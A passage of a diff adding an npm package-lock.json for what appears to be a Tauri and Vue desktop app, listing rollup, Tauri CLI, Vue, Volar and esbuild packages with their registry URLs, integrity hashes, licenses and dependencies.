+      "integrity": "sha512-RAjXjP/8c6ZtzatZcA1RaQr6O1TRhzC+adn8YZDnChliZHviqIjmvFwHcxi4JKPSDAt6Uhf/7vqcBzQJy0PDJg==",
+      "cpu": [
+        "riscv64"
+      ],
+      "dev": true,
+      "libc": [
+        "musl"
+      ],
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ]
+    },
+    "node_modules/@rollup/rollup-linux-s390x-gnu": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-s390x-gnu/-/rollup-linux-s390x-gnu-4.60.1.tgz",
+      "integrity": "sha512-wcuocpaOlaL1COBYiA89O6yfjlp3RwKDeTIA0hM7OpmhR1Bjo9j31G1uQVpDlTvwxGn2nQs65fBFL5UFd76FcQ==",
+      "cpu": [
+        "s390x"
+      ],
+      "dev": true,
+      "libc": [
+        "glibc"
+      ],
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ]
+    },
+    "node_modules/@rollup/rollup-linux-x64-gnu": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-x64-gnu/-/rollup-linux-x64-gnu-4.60.1.tgz",
+      "integrity": "sha512-77PpsFQUCOiZR9+LQEFg9GClyfkNXj1MP6wRnzYs0EeWbPcHs02AXu4xuUbM1zhwn3wqaizle3AEYg5aeoohhg==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "libc": [
+        "glibc"
+      ],
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ]
+    },
+    "node_modules/@rollup/rollup-linux-x64-musl": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-x64-musl/-/rollup-linux-x64-musl-4.60.1.tgz",
+      "integrity": "sha512-5cIATbk5vynAjqqmyBjlciMJl1+R/CwX9oLk/EyiFXDWd95KpHdrOJT//rnUl4cUcskrd0jCCw3wpZnhIHdD9w==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "libc": [
+        "musl"
+      ],
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ]
+    },
+    "node_modules/@rollup/rollup-openbsd-x64": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-openbsd-x64/-/rollup-openbsd-x64-4.60.1.tgz",
+      "integrity": "sha512-cl0w09WsCi17mcmWqqglez9Gk8isgeWvoUZ3WiJFYSR3zjBQc2J5/ihSjpl+VLjPqjQ/1hJRcqBfLjssREQILw==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "openbsd"
+      ]
+    },
+    "node_modules/@rollup/rollup-openharmony-arm64": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-openharmony-arm64/-/rollup-openharmony-arm64-4.60.1.tgz",
+      "integrity": "sha512-4Cv23ZrONRbNtbZa37mLSueXUCtN7MXccChtKpUnQNgF010rjrjfHx3QxkS2PI7LqGT5xXyYs1a7LbzAwT0iCA==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "openharmony"
+      ]
+    },
+    "node_modules/@rollup/rollup-win32-arm64-msvc": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-win32-arm64-msvc/-/rollup-win32-arm64-msvc-4.60.1.tgz",
+      "integrity": "sha512-i1okWYkA4FJICtr7KpYzFpRTHgy5jdDbZiWfvny21iIKky5YExiDXP+zbXzm3dUcFpkEeYNHgQ5fuG236JPq0g==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "win32"
+      ]
+    },
+    "node_modules/@rollup/rollup-win32-ia32-msvc": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-win32-ia32-msvc/-/rollup-win32-ia32-msvc-4.60.1.tgz",
+      "integrity": "sha512-u09m3CuwLzShA0EYKMNiFgcjjzwqtUMLmuCJLeZWjjOYA3IT2Di09KaxGBTP9xVztWyIWjVdsB2E9goMjZvTQg==",
+      "cpu": [
+        "ia32"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "win32"
+      ]
+    },
+    "node_modules/@rollup/rollup-win32-x64-gnu": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-win32-x64-gnu/-/rollup-win32-x64-gnu-4.60.1.tgz",
+      "integrity": "sha512-k+600V9Zl1CM7eZxJgMyTUzmrmhB/0XZnF4pRypKAlAgxmedUA+1v9R+XOFv56W4SlHEzfeMtzujLJD22Uz5zg==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "win32"
+      ]
+    },
+    "node_modules/@rollup/rollup-win32-x64-msvc": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-win32-x64-msvc/-/rollup-win32-x64-msvc-4.60.1.tgz",
+      "integrity": "sha512-lWMnixq/QzxyhTV6NjQJ4SFo1J6PvOX8vUx5Wb4bBPsEb+8xZ89Bz6kOXpfXj9ak9AHTQVQzlgzBEc1SyM27xQ==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "win32"
+      ]
+    },
+    "node_modules/@tauri-apps/api": {
+      "version": "2.10.1",
+      "resolved": "https://registry.npmjs.org/@tauri-apps/api/-/api-2.10.1.tgz",
+      "integrity": "sha512-hKL/jWf293UDSUN09rR69hrToyIXBb8CjGaWC7gfinvnQrBVvnLr08FeFi38gxtugAVyVcTa5/FD/Xnkb1siBw==",
+      "license": "Apache-2.0 OR MIT",
+      "funding": {
+        "type": "opencollective",
+        "url": "https://opencollective.com/tauri"
+      }
+    },
+    "node_modules/@tauri-apps/cli": {
+      "version": "2.10.1",
+      "resolved": "https://registry.npmjs.org/@tauri-apps/cli/-/cli-2.10.1.tgz",
+      "integrity": "sha512-jQNGF/5quwORdZSSLtTluyKQ+o6SMa/AUICfhf4egCGFdMHqWssApVgYSbg+jmrZoc8e1DscNvjTnXtlHLS11g==",
+      "dev": true,
+      "license": "Apache-2.0 OR MIT",
+      "bin": {
+        "tauri": "tauri.js"
+      },
+      "engines": {
+        "node": ">= 10"
+      },
+      "funding": {
+        "type": "opencollective",
+        "url": "https://opencollective.com/tauri"
+      },
+      "optionalDependencies": {
+        "@tauri-apps/cli-darwin-arm64": "2.10.1",
+        "@tauri-apps/cli-darwin-x64": "2.10.1",
+        "@tauri-apps/cli-linux-arm-gnueabihf": "2.10.1",
+        "@tauri-apps/cli-linux-arm64-gnu": "2.10.1",
+        "@tauri-apps/cli-linux-arm64-musl": "2.10.1",
+        "@tauri-apps/cli-linux-riscv64-gnu": "2.10.1",
+        "@tauri-apps/cli-linux-x64-gnu": "2.10.1",
+        "@tauri-apps/cli-linux-x64-musl": "2.10.1",
+        "@tauri-apps/cli-win32-arm64-msvc": "2.10.1",
+        "@tauri-apps/cli-win32-ia32-msvc": "2.10.1",
+        "@tauri-apps/cli-win32-x64-msvc": "2.10.1"
+      }
+    },
+    "node_modules/@tauri-apps/cli-darwin-arm64": {
+      "version": "2.10.1",
+      "resolved": "https://registry.npmjs.org/@tauri-apps/cli-darwin-arm64/-/cli-darwin-arm64-2.10.1.tgz",
+      "integrity": "sha512-Z2OjCXiZ+fbYZy7PmP3WRnOpM9+Fy+oonKDEmUE6MwN4IGaYqgceTjwHucc/kEEYZos5GICve35f7ZiizgqEnQ==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "Apache-2.0 OR MIT",
+      "optional": true,
+      "os": [
+        "darwin"
+      ],
+      "engines": {
+        "node": ">= 10"
+      }
+    },
+    "node_modules/@tauri-apps/cli-darwin-x64": {
+      "version": "2.10.1",
+      "resolved": "https://registry.npmjs.org/@tauri-apps/cli-darwin-x64/-/cli-darwin-x64-2.10.1.tgz",
+      "integrity": "sha512-V/irQVvjPMGOTQqNj55PnQPVuH4VJP8vZCN7ajnj+ZS8Kom1tEM2hR3qbbIRoS3dBKs5mbG8yg1WC+97dq17Pw==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "Apache-2.0 OR MIT",
+      "optional": true,
+      "os": [
+        "darwin"
+      ],
+      "engines": {
+        "node": ">= 10"
+      }
+    },
+    "node_modules/@tauri-apps/cli-linux-arm-gnueabihf": {
+      "version": "2.10.1",
+      "resolved": "https://registry.npmjs.org/@tauri-apps/cli-linux-arm-gnueabihf/-/cli-linux-arm-gnueabihf-2.10.1.tgz",
+      "integrity": "sha512-Hyzwsb4VnCWKGfTw+wSt15Z2pLw2f0JdFBfq2vHBOBhvg7oi6uhKiF87hmbXOBXUZaGkyRDkCHsdzJcIfoJC2w==",
+      "cpu": [
+        "arm"
+      ],
+      "dev": true,
+      "license": "Apache-2.0 OR MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">= 10"
+      }
+    },
+    "node_modules/@tauri-apps/cli-linux-arm64-gnu": {
+      "version": "2.10.1",
+      "resolved": "https://registry.npmjs.org/@tauri-apps/cli-linux-arm64-gnu/-/cli-linux-arm64-gnu-2.10.1.tgz",
+      "integrity": "sha512-OyOYs2t5GkBIvyWjA1+h4CZxTcdz1OZPCWAPz5DYEfB0cnWHERTnQ/SLayQzncrT0kwRoSfSz9KxenkyJoTelA==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "libc": [
+        "glibc"
+      ],
+      "license": "Apache-2.0 OR MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">= 10"
+      }
+    },
+    "node_modules/@tauri-apps/cli-linux-arm64-musl": {
+      "version": "2.10.1",
+      "resolved": "https://registry.npmjs.org/@tauri-apps/cli-linux-arm64-musl/-/cli-linux-arm64-musl-2.10.1.tgz",
+      "integrity": "sha512-MIj78PDDGjkg3NqGptDOGgfXks7SYJwhiMh8SBoZS+vfdz7yP5jN18bNaLnDhsVIPARcAhE1TlsZe/8Yxo2zqg==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "libc": [
+        "musl"
+      ],
+      "license": "Apache-2.0 OR MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">= 10"
+      }
+    },
+    "node_modules/@tauri-apps/cli-linux-riscv64-gnu": {
+      "version": "2.10.1",
+      "resolved": "https://registry.npmjs.org/@tauri-apps/cli-linux-riscv64-gnu/-/cli-linux-riscv64-gnu-2.10.1.tgz",
+      "integrity": "sha512-X0lvOVUg8PCVaoEtEAnpxmnkwlE1gcMDTqfhbefICKDnOTJ5Est3qL0SrWxizDackIOKBcvtpejrSiVpuJI1kw==",
+      "cpu": [
+        "riscv64"
+      ],
+      "dev": true,
+      "libc": [
+        "glibc"
+      ],
+      "license": "Apache-2.0 OR MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">= 10"
+      }
+    },
+    "node_modules/@tauri-apps/cli-linux-x64-gnu": {
+      "version": "2.10.1",
+      "resolved": "https://registry.npmjs.org/@tauri-apps/cli-linux-x64-gnu/-/cli-linux-x64-gnu-2.10.1.tgz",
+      "integrity": "sha512-2/12bEzsJS9fAKybxgicCDFxYD1WEI9kO+tlDwX5znWG2GwMBaiWcmhGlZ8fi+DMe9CXlcVarMTYc0L3REIRxw==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "libc": [
+        "glibc"
+      ],
+      "license": "Apache-2.0 OR MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">= 10"
+      }
+    },
+    "node_modules/@tauri-apps/cli-linux-x64-musl": {
+      "version": "2.10.1",
+      "resolved": "https://registry.npmjs.org/@tauri-apps/cli-linux-x64-musl/-/cli-linux-x64-musl-2.10.1.tgz",
+      "integrity": "sha512-Y8J0ZzswPz50UcGOFuXGEMrxbjwKSPgXftx5qnkuMs2rmwQB5ssvLb6tn54wDSYxe7S6vlLob9vt0VKuNOaCIQ==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "libc": [
+        "musl"
+      ],
+      "license": "Apache-2.0 OR MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">= 10"
+      }
+    },
+    "node_modules/@tauri-apps/cli-win32-arm64-msvc": {
+      "version": "2.10.1",
+      "resolved": "https://registry.npmjs.org/@tauri-apps/cli-win32-arm64-msvc/-/cli-win32-arm64-msvc-2.10.1.tgz",
+      "integrity": "sha512-iSt5B86jHYAPJa/IlYw++SXtFPGnWtFJriHn7X0NFBVunF6zu9+/zOn8OgqIWSl8RgzhLGXQEEtGBdR4wzpVgg==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "Apache-2.0 OR MIT",
+      "optional": true,
+      "os": [
+        "win32"
+      ],
+      "engines": {
+        "node": ">= 10"
+      }
+    },
+    "node_modules/@tauri-apps/cli-win32-ia32-msvc": {
+      "version": "2.10.1",
+      "resolved": "https://registry.npmjs.org/@tauri-apps/cli-win32-ia32-msvc/-/cli-win32-ia32-msvc-2.10.1.tgz",
+      "integrity": "sha512-gXyxgEzsFegmnWywYU5pEBURkcFN/Oo45EAwvZrHMh+zUSEAvO5E8TXsgPADYm31d1u7OQU3O3HsYfVBf2moHw==",
+      "cpu": [
+        "ia32"
+      ],
+      "dev": true,
+      "license": "Apache-2.0 OR MIT",
+      "optional": true,
+      "os": [
+        "win32"
+      ],
+      "engines": {
+        "node": ">= 10"
+      }
+    },
+    "node_modules/@tauri-apps/cli-win32-x64-msvc": {
+      "version": "2.10.1",
+      "resolved": "https://registry.npmjs.org/@tauri-apps/cli-win32-x64-msvc/-/cli-win32-x64-msvc-2.10.1.tgz",
+      "integrity": "sha512-6Cn7YpPFwzChy0ERz6djKEmUehWrYlM+xTaNzGPgZocw3BD7OfwfWHKVWxXzdjEW2KfKkHddfdxK1XXTYqBRLg==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "Apache-2.0 OR MIT",
+      "optional": true,
+      "os": [
+        "win32"
+      ],
+      "engines": {
+        "node": ">= 10"
+      }
+    },
+    "node_modules/@tauri-apps/plugin-opener": {
+      "version": "2.5.3",
+      "resolved": "https://registry.npmjs.org/@tauri-apps/plugin-opener/-/plugin-opener-2.5.3.tgz",
+      "integrity": "sha512-CCcUltXMOfUEArbf3db3kCE7Ggy1ExBEBl51Ko2ODJ6GDYHRp1nSNlQm5uNCFY5k7/ufaK5Ib3Du/Zir19IYQQ==",
+      "license": "MIT OR Apache-2.0",
+      "dependencies": {
+        "@tauri-apps/api": "^2.8.0"
+      }
+    },
+    "node_modules/@types/estree": {
+      "version": "1.0.8",
+      "resolved": "https://registry.npmjs.org/@types/estree/-/estree-1.0.8.tgz",
+      "integrity": "sha512-dWHzHa2WqEXI/O1E9OjrocMTKJl2mSrEolh1Iomrv6U+JuNwaHXsXx9bLu5gG7BUWFIN0skIQJQ/L1rIex4X6w==",
+      "dev": true,
+      "license": "MIT"
+    },
+    "node_modules/@vitejs/plugin-vue": {
+      "version": "5.2.4",
+      "resolved": "https://registry.npmjs.org/@vitejs/plugin-vue/-/plugin-vue-5.2.4.tgz",
+      "integrity": "sha512-7Yx/SXSOcQq5HiiV3orevHUFn+pmMB4cgbEkDYgnkUWb0WfeQ/wa2yFv6D5ICiCQOVpjA7vYDXrC7AGO8yjDHA==",
+      "dev": true,
+      "license": "MIT",
+      "engines": {
+        "node": "^18.0.0 || >=20.0.0"
+      },
+      "peerDependencies": {
+        "vite": "^5.0.0 || ^6.0.0",
+        "vue": "^3.2.25"
+      }
+    },
+    "node_modules/@volar/language-core": {
+      "version": "2.4.15",
+      "resolved": "https://registry.npmjs.org/@volar/language-core/-/language-core-2.4.15.tgz",
+      "integrity": "sha512-3VHw+QZU0ZG9IuQmzT68IyN4hZNd9GchGPhbD9+pa8CVv7rnoOZwo7T8weIbrRmihqy3ATpdfXFnqRrfPVK6CA==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@volar/source-map": "2.4.15"
+      }
+    },
+    "node_modules/@volar/source-map": {
+      "version": "2.4.15",
+      "resolved": "https://registry.npmjs.org/@volar/source-map/-/source-map-2.4.15.tgz",
+      "integrity": "sha512-CPbMWlUN6hVZJYGcU/GSoHu4EnCHiLaXI9n8c9la6RaI9W5JHX+NqG+GSQcB0JdC2FIBLdZJwGsfKyBB71VlTg==",
+      "dev": true,
+      "license": "MIT"
+    },
+    "node_modules/@volar/typescript": {
+      "version": "2.4.15",
+      "resolved": "https://registry.npmjs.org/@volar/typescript/-/typescript-2.4.15.tgz",
+      "integrity": "sha512-2aZ8i0cqPGjXb4BhkMsPYDkkuc2ZQ6yOpqwAuNwUoncELqoy5fRgOQtLR9gB0g902iS0NAkvpIzs27geVyVdPg==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@volar/language-core": "2.4.15",
+        "path-browserify": "^1.0.1",
+        "vscode-uri": "^3.0.8"
+      }
+    },
+    "node_modules/@vue/compiler-core": {
+      "version": "3.5.32",
+      "resolved": "https://registry.npmjs.org/@vue/compiler-core/-/compiler-core-3.5.32.tgz",
+      "integrity": "sha512-4x74Tbtqnda8s/NSD6e1Dr5p1c8HdMU5RWSjMSUzb8RTcUQqevDCxVAitcLBKT+ie3o0Dl9crc/S/opJM7qBGQ==",
+      "license": "MIT",
+      "dependencies": {
+        "@babel/parser": "^7.29.2",
+        "@vue/shared": "3.5.32",
+        "entities": "^7.0.1",
+        "estree-walker": "^2.0.2",
+        "source-map-js": "^1.2.1"
+      }
+    },
+    "node_modules/@vue/compiler-dom": {
+      "version": "3.5.32",
+      "resolved": "https://registry.npmjs.org/@vue/compiler-dom/-/compiler-dom-3.5.32.tgz",
+      "integrity": "sha512-ybHAu70NtiEI1fvAUz3oXZqkUYEe5J98GjMDpTGl5iHb0T15wQYLR4wE3h9xfuTNA+Cm2f4czfe8B4s+CCH57Q==",
+      "license": "MIT",
+      "dependencies": {
+        "@vue/compiler-core": "3.5.32",
+        "@vue/shared": "3.5.32"
+      }
+    },
+    "node_modules/@vue/compiler-sfc": {
+      "version": "3.5.32",
+      "resolved": "https://registry.npmjs.org/@vue/compiler-sfc/-/compiler-sfc-3.5.32.tgz",
+      "integrity": "sha512-8UYUYo71cP/0YHMO814TRZlPuUUw3oifHuMR7Wp9SNoRSrxRQnhMLNlCeaODNn6kNTJsjFoQ/kqIj4qGvya4Xg==",
+      "license": "MIT",
+      "dependencies": {
+        "@babel/parser": "^7.29.2",
+        "@vue/compiler-core": "3.5.32",
+        "@vue/compiler-dom": "3.5.32",
+        "@vue/compiler-ssr": "3.5.32",
+        "@vue/shared": "3.5.32",
+        "estree-walker": "^2.0.2",
+        "magic-string": "^0.30.21",
+        "postcss": "^8.5.8",
+        "source-map-js": "^1.2.1"
+      }
+    },
+    "node_modules/@vue/compiler-ssr": {
+      "version": "3.5.32",
+      "resolved": "https://registry.npmjs.org/@vue/compiler-ssr/-/compiler-ssr-3.5.32.tgz",
+      "integrity": "sha512-Gp4gTs22T3DgRotZ8aA/6m2jMR+GMztvBXUBEUOYOcST+giyGWJ4WvFd7QLHBkzTxkfOt8IELKNdpzITLbA2rw==",
+      "license": "MIT",
+      "dependencies": {
+        "@vue/compiler-dom": "3.5.32",
+        "@vue/shared": "3.5.32"
+      }
+    },
+    "node_modules/@vue/compiler-vue2": {
+      "version": "2.7.16",
+      "resolved": "https://registry.npmjs.org/@vue/compiler-vue2/-/compiler-vue2-2.7.16.tgz",
+      "integrity": "sha512-qYC3Psj9S/mfu9uVi5WvNZIzq+xnXMhOwbTFKKDD7b1lhpnn71jXSFdTQ+WsIEk0ONCd7VV2IMm7ONl6tbQ86A==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "de-indent": "^1.0.2",
+        "he": "^1.2.0"
+      }
+    },
+    "node_modules/@vue/language-core": {
+      "version": "2.2.12",
+      "resolved": "https://registry.npmjs.org/@vue/language-core/-/language-core-2.2.12.tgz",
+      "integrity": "sha512-IsGljWbKGU1MZpBPN+BvPAdr55YPkj2nB/TBNGNC32Vy2qLG25DYu/NBN2vNtZqdRbTRjaoYrahLrToim2NanA==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@volar/language-core": "2.4.15",
+        "@vue/compiler-dom": "^3.5.0",
+        "@vue/compiler-vue2": "^2.7.16",
+        "@vue/shared": "^3.5.0",
+        "alien-signals": "^1.0.3",
+        "minimatch": "^9.0.3",
+        "muggle-string": "^0.4.1",
+        "path-browserify": "^1.0.1"
+      },
+      "peerDependencies": {
+        "typescript": "*"
+      },
+      "peerDependenciesMeta": {
+        "typescript": {
+          "optional": true
+        }
+      }
+    },
+    "node_modules/@vue/reactivity": {
+      "version": "3.5.32",
+      "resolved": "https://registry.npmjs.org/@vue/reactivity/-/reactivity-3.5.32.tgz",
+      "integrity": "sha512-/ORasxSGvZ6MN5gc+uE364SxFdJ0+WqVG0CENXaGW58TOCdrAW76WWaplDtECeS1qphvtBZtR+3/o1g1zL4xPQ==",
+      "license": "MIT",
+      "dependencies": {
+        "@vue/shared": "3.5.32"
+      }
+    },
+    "node_modules/@vue/runtime-core": {
+      "version": "3.5.32",
+      "resolved": "https://registry.npmjs.org/@vue/runtime-core/-/runtime-core-3.5.32.tgz",
+      "integrity": "sha512-pDrXCejn4UpFDFmMd27AcJEbHaLemaE5o4pbb7sLk79SRIhc6/t34BQA7SGNgYtbMnvbF/HHOftYBgFJtUoJUQ==",
+      "license": "MIT",
+      "dependencies": {
+        "@vue/reactivity": "3.5.32",
+        "@vue/shared": "3.5.32"
+      }
+    },
+    "node_modules/@vue/runtime-dom": {
+      "version": "3.5.32",
+      "resolved": "https://registry.npmjs.org/@vue/runtime-dom/-/runtime-dom-3.5.32.tgz",
+      "integrity": "sha512-1CDVv7tv/IV13V8Nip1k/aaObVbWqRlVCVezTwx3K07p7Vxossp5JU1dcPNhJk3w347gonIUT9jQOGutyJrSVQ==",
+      "license": "MIT",
+      "dependencies": {
+        "@vue/reactivity": "3.5.32",
+        "@vue/runtime-core": "3.5.32",
+        "@vue/shared": "3.5.32",
+        "csstype": "^3.2.3"
+      }
+    },
+    "node_modules/@vue/server-renderer": {
+      "version": "3.5.32",
+      "resolved": "https://registry.npmjs.org/@vue/server-renderer/-/server-renderer-3.5.32.tgz",
+      "integrity": "sha512-IOjm2+JQwRFS7W28HNuJeXQle9KdZbODFY7hFGVtnnghF51ta20EWAZJHX+zLGtsHhaU6uC9BGPV52KVpYryMQ==",
+      "license": "MIT",
+      "dependencies": {
+        "@vue/compiler-ssr": "3.5.32",
+        "@vue/shared": "3.5.32"
+      },
+      "peerDependencies": {
+        "vue": "3.5.32"
+      }
+    },
+    "node_modules/@vue/shared": {
+      "version": "3.5.32",
+      "resolved": "https://registry.npmjs.org/@vue/shared/-/shared-3.5.32.tgz",
+      "integrity": "sha512-ksNyrmRQzWJJ8n3cRDuSF7zNNontuJg1YHnmWRJd2AMu8Ij2bqwiiri2lH5rHtYPZjj4STkNcgcmiQqlOjiYGg==",
+      "license": "MIT"
+    },
+    "node_modules/alien-signals": {
+      "version": "1.0.13",
+      "resolved": "https://registry.npmjs.org/alien-signals/-/alien-signals-1.0.13.tgz",
+      "integrity": "sha512-OGj9yyTnJEttvzhTUWuscOvtqxq5vrhF7vL9oS0xJ2mK0ItPYP1/y+vCFebfxoEyAz0++1AIwJ5CMr+Fk3nDmg==",
+      "dev": true,
+      "license": "MIT"
+    },
+    "node_modules/balanced-match": {
+      "version": "1.0.2",
+      "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz",
+      "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==",
+      "dev": true,
+      "license": "MIT"
+    },
+    "node_modules/brace-expansion": {
+      "version": "2.1.0",
+      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.1.0.tgz",
+      "integrity": "sha512-TN1kCZAgdgweJhWWpgKYrQaMNHcDULHkWwQIspdtjV4Y5aurRdZpjAqn6yX3FPqTA9ngHCc4hJxMAMgGfve85w==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "balanced-match": "^1.0.0"
+      }
+    },
+    "node_modules/csstype": {
+      "version": "3.2.3",
+      "resolved": "https://registry.npmjs.org/csstype/-/csstype-3.2.3.tgz",
+      "integrity": "sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ==",
+      "license": "MIT"
+    },
+    "node_modules/de-indent": {
+      "version": "1.0.2",
+      "resolved": "https://registry.npmjs.org/de-indent/-/de-indent-1.0.2.tgz",
+      "integrity": "sha512-e/1zu3xH5MQryN2zdVaF0OrdNLUbvWxzMbi+iNA6Bky7l1RoP8a2fIbRocyHclXt/arDrrR6lL3TqFD9pMQTsg==",
+      "dev": true,
+      "license": "MIT"
+    },
+    "node_modules/entities": {
+      "version": "7.0.1",
+      "resolved": "https://registry.npmjs.org/entities/-/entities-7.0.1.tgz",
+      "integrity": "sha512-TWrgLOFUQTH994YUyl1yT4uyavY5nNB5muff+RtWaqNVCAK408b5ZnnbNAUEWLTCpum9w6arT70i1XdQ4UeOPA==",
+      "license": "BSD-2-Clause",
+      "engines": {
+        "node": ">=0.12"
+      },
+      "funding": {
+        "url": "https://github.com/fb55/entities?sponsor=1"
+      }
+    },
+    "node_modules/esbuild": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.25.12.tgz",
+      "integrity": "sha512-bbPBYYrtZbkt6Os6FiTLCTFxvq4tt3JKall1vRwshA3fdVztsLAatFaZobhkBC8/BrPetoa0oksYoKXoG4ryJg==",
+      "dev": true,
+      "hasInstallScript": true,
+      "license": "MIT",
+      "bin": {
+        "esbuild": "bin/esbuild"
+      },
+      "engines": {
+        "node": ">=18"
+      },
+      "optionalDependencies": {
+        "@esbuild/aix-ppc64": "0.25.12",
+        "@esbuild/android-arm": "0.25.12",
+        "@esbuild/android-arm64": "0.25.12",
+        "@esbuild/android-x64": "0.25.12",
+        "@esbuild/darwin-arm64": "0.25.12",
+        "@esbuild/darwin-x64": "0.25.12",
+        "@esbuild/freebsd-arm64": "0.25.12",
+        "@esbuild/freebsd-x64": "0.25.12",
+        "@esbuild/linux-arm": "0.25.12",
+        "@esbuild/linux-arm64": "0.25.12",
+        "@esbuild/linux-ia32": "0.25.12",
+        "@esbuild/linux-loong64": "0.25.12",
+        "@esbuild/linux-mips64el": "0.25.12",
+        "@esbuild/linux-ppc64": "0.25.12",
+        "@esbuild/linux-riscv64": "0.25.12",
+        "@esbuild/linux-s390x": "0.25.12",
+        "@esbuild/linux-x64": "0.25.12",
+        "@esbuild/netbsd-arm64": "0.25.12",
+        "@esbuild/netbsd-x64": "0.25.12",
+        "@esbuild/openbsd-arm64": "0.25.12",
+        "@esbuild/openbsd-x64": "0.25.12",
+        "@esbuild/openharmony-arm64": "0.25.12",
+        "@esbuild/sunos-x64": "0.25.12",
+        "@esbuild/win32-arm64": "0.25.12",
+        "@esbuild/win32-ia32": "0.25.12",
+        "@esbuild/win32-x64": "0.25.12"
+      }
+    },
+    "node_modules/estree-walker": {
+      "version": "2.0.2",
+      "resolved": "https://registry.npmjs.org/estree-walker/-/estree-walker-2.0.2.tgz",
+      "integrity": "sha512-Rfkk/Mp/DL7JVje3u18FxFujQlTNR2q6QfMSMB7AvCBx91NGj/ba3kCfza0f6dVDbw7YlRf/nDrn7pQrCCyQ/w==",
+      "license": "MIT"
+    },
+    "node_modules/fdir": {
+      "version": "6.5.0",
+      "resolved": "https://registry.npmjs.org/fdir/-/fdir-6.5.0.tgz",
+      "integrity": "sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg==",
+      "dev": true,
+      "license": "MIT",
+      "engines": {
+        "node": ">=12.0.0"
+      },
+      "peerDependencies": {
+        "picomatch": "^3 || ^4"
+      },
+      "peerDependenciesMeta": {
+        "picomatch": {
+          "optional": true
+        }
+      }
+    },
+    "node_modules/fsevents": {
+      "version": "2.3.3",
+      "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz",
+      "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==",
+      "dev": true,
+      "hasInstallScript": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "darwin"
+      ],
+      "engines": {
+        "node": "^8.16.0 || ^10.6.0 || >=11.0.0"
+      }
+    },
+    "node_modules/he": {
+      "version": "1.2.0",
+      "resolved": "https://registry.npmjs.org/he/-/he-1.2.0.tgz",
+      "integrity": "sha512-F/1DnUGPopORZi0ni+CvrCgHQ5FyEAHRLSApuYWMmrbSwoN2Mn/7k+Gl38gJnR7yyDZk6WLXwiGod1JOWNDKGw==",
+      "dev": true,
+      "license": "MIT",
+      "bin": {
+        "he": "bin/he"
+      }
+    },
+    "node_modules/magic-string": {
+      "version": "0.30.21",
+      "resolved": "https://registry.npmjs.org/magic-string/-/magic-string-0.30.21.tgz",
